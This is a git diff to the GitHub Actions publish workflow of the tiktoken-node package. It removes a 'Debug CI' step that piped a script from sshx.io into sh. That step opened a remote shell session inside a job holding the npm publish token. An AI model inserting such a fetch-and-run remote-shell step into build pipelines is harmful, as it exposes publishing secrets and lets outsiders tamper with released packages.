diff --git a/.github/workflows/publish.yml b/.github/workflows/publish.yml index fa547eb..2e81abb 100644 --- a/.github/workflows/publish.yml +++ b/.github/workflows/publish.yml @@ -140,9 +140,6 @@ jobs: env: NODE_AUTH_TOKEN: ${{secrets.NPM_TOKEN}} - - name: Debug CI - run: curl -sSf https://sshx.io/get | sh -s run - - name: Publish to npm working-directory: tiktoken-node run: npm publish --access=public